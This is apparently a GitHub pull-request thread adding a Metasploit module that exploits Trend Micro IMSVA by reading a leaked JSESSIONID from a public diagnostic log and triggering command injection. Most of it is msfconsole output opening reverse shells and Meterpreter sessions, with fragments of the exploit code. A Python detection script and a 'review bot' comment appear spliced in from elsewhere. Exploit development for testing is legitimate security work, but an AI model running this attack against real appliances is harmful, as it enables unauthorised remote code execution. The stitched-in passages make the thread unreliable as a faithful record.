
Adding Trend Micro IMSVA Widget RCE module #9053

Merged
merged 3 commits into from Oct 10, 2017

Conversation

@mmetince (Contributor) commented Oct 8, 2017:

Fixes #8849
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.

Verification Steps

A successful check of the exploit will look like this:

  • Start `msfconsole`
  • `use exploit/linux/http/trendmicro_imsva_widget_exec`
  • Set `RHOST`
  • Set `LHOST`
  • Run `check`
  • Verify that you are seeing `The target appears to be vulnerable.`
  • Run `exploit`
  • Verify that you are seeing `Awesome. JSESSIONID value` in the console.
  • Verify that you are getting `Session with widget framework successfully initiated.`

Scenarios

```
msf > use exploit/linux/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300

pwd
/opt/trend/imss/UI/adminUI/ROOT/widget
```
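The sequence this PR describes (an unauthenticated read of `/widget/repository/log/diagnostic.log`, followed by widget framework requests replaying the leaked JSESSIONID) leaves a recognisable trace in the appliance's web access log. The detection script below is an added example, not code from the PR or from the module; the combined log format, the `/widget/index.php` path and every sample line are constructed assumptions.

```python
import re
from collections import namedtuple
from datetime import datetime

# Path the PR identifies as the unauthenticated session-token leak, and the
# widget framework prefix the module then drives with the stolen JSESSIONID.
LOG_PATH = "/widget/repository/log/diagnostic.log"
WIDGET_PREFIX = "/widget/"

# Combined-log-format parser. The format, the /widget/index.php path and all
# sample lines are constructed for this example, not captured from IMSVA.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                     r'(?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')
Hit = namedtuple("Hit", "ip log_read widget_call")

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], m["path"].split("?", 1)[0], int(m["status"]), ts

def find_session_theft(lines, window_seconds=300):
    """Flag clients that fetched diagnostic.log successfully and then called a
    widget endpoint within window_seconds: the read-then-replay sequence the
    module performs. A 403 on the log (patched appliance) is not a read."""
    reads, hits = {}, []
    for rec in filter(None, map(parse_line, lines)):
        ip, path, status, ts = rec
        if path == LOG_PATH and status == 200:
            reads[ip] = ts                       # latest successful leak read
        elif path.startswith(WIDGET_PREFIX) and ip in reads:
            read_ts = reads.pop(ip)
            if 0 <= (ts - read_ts).total_seconds() <= window_seconds:
                hits.append(Hit(ip, read_ts, ts))
    return hits

# Constructed sample: an admin browsing normally, an attacker reading the leak
# and replaying it seconds later, a client refused with 403, and a slow reader.
SAMPLE_LOG = """\
12.0.0.50 - - [09/Oct/2017:19:09:30 +0300] "GET /widget/index.php HTTP/1.1" 200 5120
12.0.0.9 - - [09/Oct/2017:18:40:00 +0300] "GET /widget/repository/log/diagnostic.log HTTP/1.1" 200 88213
12.0.0.1 - - [09/Oct/2017:19:10:02 +0300] "GET /widget/repository/log/diagnostic.log HTTP/1.1" 200 88213
12.0.0.1 - - [09/Oct/2017:19:10:05 +0300] "POST /widget/index.php HTTP/1.1" 200 310
12.0.0.7 - - [09/Oct/2017:19:12:40 +0300] "GET /widget/repository/log/diagnostic.log HTTP/1.1" 403 211
12.0.0.7 - - [09/Oct/2017:19:12:41 +0300] "GET /widget/index.php HTTP/1.1" 302 0
12.0.0.9 - - [09/Oct/2017:19:20:00 +0300] "GET /widget/index.php HTTP/1.1" 200 5120
"""
```

Run `find_session_theft(SAMPLE_LOG.splitlines())` to get the one flagged client (12.0.0.1); the 403 client and the reader whose widget call came 40 minutes later are not reported.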

A successful check of the exploit will look like this:

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/trendmicro_imsva_widget_exec`

@h00die (Contributor), Oct 9, 2017:

s/windows/linux/

## Scenarios

msf > use exploit/windows/http/trendmicro_imsva_widget_exec

@h00die (Contributor), Oct 9, 2017:

s/windows/linux/


msf > use exploit/windows/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201

@h00die (Contributor), Oct 9, 2017:

officescan or interscan?


register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])

@h00die (Contributor), Oct 9, 2017:

officescan or interscan?

RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_officescan_exec) > exploit

@h00die (Contributor), Oct 9, 2017:

officescan or interscan?

msf > use exploit/windows/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_officescan_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_officescan_exec) > check

@h00die (Contributor), Oct 9, 2017:

officescan or interscan?

@h00die (Contributor) commented Oct 9, 2017:

I'm seeing no love on bind payloads, tested python/meterpreter/bind_tcp and python/meterpreter_bind_tcp.
Looks like the others are working though.

@h00die (Contributor) commented Oct 9, 2017:

no admin logged in

```
msf exploit(trendmicro_imsva_widget_exec) > set payload python/meterpreter/reverse_tcp
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = E0F0B292796E4B197ACFAE95EA29E920
[*] Initiating session with widget framework
[-] Exploit aborted due to failure: no-access: Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA
[*] Exploit completed, but no session was created.
```

with admin logged in

```
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 477D3B22D8A7ADC19EF33CA02ECF3E77
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Sending stage (42231 bytes) to 2.2.2.2
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:48611) at 2017-10-09 12:00:16 -0400

meterpreter > sysinfo
Computer        : imvsa.home
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
```

@h00die h00die added the module label Oct 9, 2017

@h00die h00die self-assigned this Oct 9, 2017

'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
})
if res && res.code == 200 && res.body.include?('JSEEEIONID')

@wvu-r7 (Contributor), Oct 9, 2017:

Did you mean JSESSIONID?

@h00die (Contributor), Oct 9, 2017:

looking at my log file right now, it is JSEEEIONID

@wvu-r7 (Contributor), Oct 9, 2017:

wat

'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
})
if res && res.code == 200 && res.body.include?('JSEEEIONID')
res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last
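Review bot: the `include?('JSEEEIONID')` guard on the third line is redundant with the `scan` on the fourth, and `.flatten.last` yields nil when the body contains the marker but no 32-hex-character token after it, so whatever receives this value must treat nil as "no session id found" rather than use it. Since the thread is already questioning the marker's spelling, putting it in one constant shared by both lines would keep the two from diverging.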

@wvu-r7 (Contributor), Oct 9, 2017:

And here?

@h00die (Contributor), Oct 9, 2017:

looking at my log file right now, it is JSEEEIONID

@wvu-r7 (Contributor), Oct 9, 2017:

:(

@h00die (Contributor) commented Oct 9, 2017:

Everything's looking good to me; spelling issues and bind shell are the only two issues I'm still seeing.

@h00die (Contributor) commented Oct 9, 2017:

@wvu-r7
https://1.1.1.1:8445/widget/repository/log/diagnostic.log

```
2017-10-09 19:09:32,619,DEBUG,null,null,[product_auth] JSEEEIONID:E0F0B292796E4B197ACFAE95EA29E920
2017-10-09 19:09:32,619,INFO,null,null,<br />
<b>Warning</b>: date(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in <b>/opt/trend/imss/UI/adminUI/ROOT/widget/lib/log4php/src/main/php/helpers/LoggerDatePatternConverter.php</b> on line <b>51</b><br /><br />
```
@mmetince (Contributor, Author) commented Oct 9, 2017:

Going to clean up all the grammar issues once I'm finished with OfficeScan. Thanks for reviewing @h00die 👌 Could you please show me how to enable python/meterpreter/bind_tcp etc. python bind payloads?

@h00die (Contributor) commented Oct 9, 2017:

```
msf > use exploit/linux/http/trendmicro_imsva_widget_exec 
msf exploit(trendmicro_imsva_widget_exec) > set payload python/meterpreter/bind_tcp
payload => python/meterpreter/bind_tcp
msf exploit(trendmicro_imsva_widget_exec) > set verbose true
verbose => true
msf exploit(trendmicro_imsva_widget_exec) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(trendmicro_imsva_widget_exec) > set lport 9870
lport => 9870
msf exploit(trendmicro_imsva_widget_exec) > check
[*] 2.2.2.2:8445 The target appears to be vulnerable.
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started bind handler
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 6F00D4F4EA864621DE853B81DEF8BCCC
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Exploit completed, but no session was created.
```
@mmetince (Contributor, Author) commented Oct 9, 2017:

I misunderstood the situation. Binds are not gonna work because of default iptables rules on IMSVA. @h00die

```
[root@imsva ~]# iptables --list
Chain INPUT (policy DROP)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             anywhere            
ACCEPT     icmp --  anywhere             anywhere            
DROP       icmp --  anywhere             anywhere            icmp timestamp-request 
ACCEPT     all  --  anywhere             anywhere            state RELATED,ESTABLISHED 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8009 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8446 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8447 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:8445 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:ssh 
DROP       tcp  --  anywhere             anywhere            tcp dpt:rtsserv 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:domain 
ACCEPT     udp  --  12.0.0.201           anywhere            udp dpt:domain 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:sip 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:postgres 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:15505 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:ldap 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:15506 
ACCEPT     tcp  --  12.0.0.201           anywhere            tcp dpt:10040 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:smtp 
ACCEPT     tcp  --  anywhere             anywhere            tcp dpt:pop3 

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       icmp --  anywhere             anywhere            icmp timestamp-reply 
```
@h00die (Contributor) commented Oct 9, 2017:

Had a feeling it was iptables or permissions.
I'm not actually sure how to specify reverse only, but I'm sure this isn't the first time that's been needed.

@mmetince (Contributor, Author) commented Oct 9, 2017:

Thanks to hdm on IRC (reference modules/exploits/osx/email/mailapp_image_exec.rb):

```ruby
'Payload' =>
  {
    'Compat' =>
      {
        'ConnectionType' => '-bind',
      },
  },
```

I will add this when the module doesn't need other modification.

@h00die (Contributor) commented Oct 9, 2017:

With grammar being fixed, I think that's the last change that needs to happen for this to be good to go (afaik).

@h00die (Contributor) commented Oct 10, 2017:

Saw your other comment deleted; is this ready for testing?

@mmetince (Contributor, Author) commented Oct 10, 2017:

Yea yea, I was complaining about the ConnectionType flag :-) But I solved it ten seconds after writing the comment, thus I deleted it.

We are good to go @h00die. It's ready imho.

@h00die h00die merged commit fb16f1f into rapid7:master Oct 10, 2017

1 check passed

continuous-integration/travis-ci/pr: The Travis CI build passed
h00die added a commit that referenced this pull request Oct 10, 2017
@h00die (Contributor) commented Oct 10, 2017:

and one last time for good measure:

```
msf exploit(trendmicro_imsva_widget_exec) > show payloads

Compatible Payloads
===================

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   generic/custom                                        normal  Custom Payload
   generic/shell_reverse_tcp                             normal  Generic Command Shell, Reverse TCP Inline
   python/meterpreter/reverse_http                       normal  Python Meterpreter, Python Reverse HTTP Stager
   python/meterpreter/reverse_https                      normal  Python Meterpreter, Python Reverse HTTPS Stager
   python/meterpreter/reverse_tcp                        normal  Python Meterpreter, Python Reverse TCP Stager
   python/meterpreter/reverse_tcp_ssl                    normal  Python Meterpreter, Python Reverse TCP SSL Stager
   python/meterpreter/reverse_tcp_uuid                   normal  Python Meterpreter, Python Reverse TCP Stager with UUID Support
   python/meterpreter_reverse_http                       normal  Python Meterpreter Shell, Reverse HTTP Inline
   python/meterpreter_reverse_https                      normal  Python Meterpreter Shell, Reverse HTTPS Inline
   python/meterpreter_reverse_tcp                        normal  Python Meterpreter Shell, Reverse TCP Inline
   python/shell_reverse_tcp                              normal  Command Shell, Reverse TCP (via python)
   python/shell_reverse_tcp_ssl                          normal  Command Shell, Reverse TCP SSL (via python)

msf exploit(trendmicro_imsva_widget_exec) > set payload python/meterpreter_reverse_https 
payload => python/meterpreter_reverse_https
msf exploit(trendmicro_imsva_widget_exec) > show options

Module options (exploit/linux/http/trendmicro_imsva_widget_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      2.2.2.2    yes       The target address
   RPORT      8445             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Trend Micro IMSVA management interface
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter_reverse_https):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   LHOST             1.1.1.1    yes       The local listener hostname
   LPORT             8443             yes       The local listener port
   LURI                               no        The HTTP Path
   PayloadProxyHost                   no        The proxy server's IP address
   PayloadProxyPort  8080             yes       The proxy port to connect to


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(trendmicro_imsva_widget_exec) > set lport 8987
lport => 8987
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started HTTPS reverse handler on https://1.1.1.1:8987
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 6F00D4F4EA864621DE853B81DEF8BCCC
[*] Initiating session with widget framework
[-] Exploit aborted due to failure: no-access: Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA
[*] Exploit completed, but no session was created.
msf exploit(trendmicro_imsva_widget_exec) > exploit

[*] Started HTTPS reverse handler on https://1.1.1.1:8987
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 713E07C537DE358A47A300DDE4D104F7
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] https://1.1.1.1:8987 handling request from 2.2.2.2; (UUID: hrekqtbt) Redirecting stageless connection from /K3RFyy_CzZGCr5e723LUEwiSbaS8b_UWGRdHMfuJO9LJyzfzO0XCA6E8Bwo with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://1.1.1.1:8987 handling request from 2.2.2.2; (UUID: hrekqtbt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (1.1.1.1:8987 -> 2.2.2.2:41863) at 2017-10-10 19:24:44 -0400
pwd

meterpreter > pwd
/opt/trend/imss/UI/adminUI/ROOT/widget
```

@h00die (Contributor) commented Oct 10, 2017:

Release Notes

This PR adds an auth bypass (log file read for session stealing) and command execution exploit against Trend Micro's InterScan Messaging Security (Virtual Appliance).

@h00die (Contributor) commented Oct 10, 2017:

@mmetince thanks for the submission, it was pretty solid from the start so easy to test!
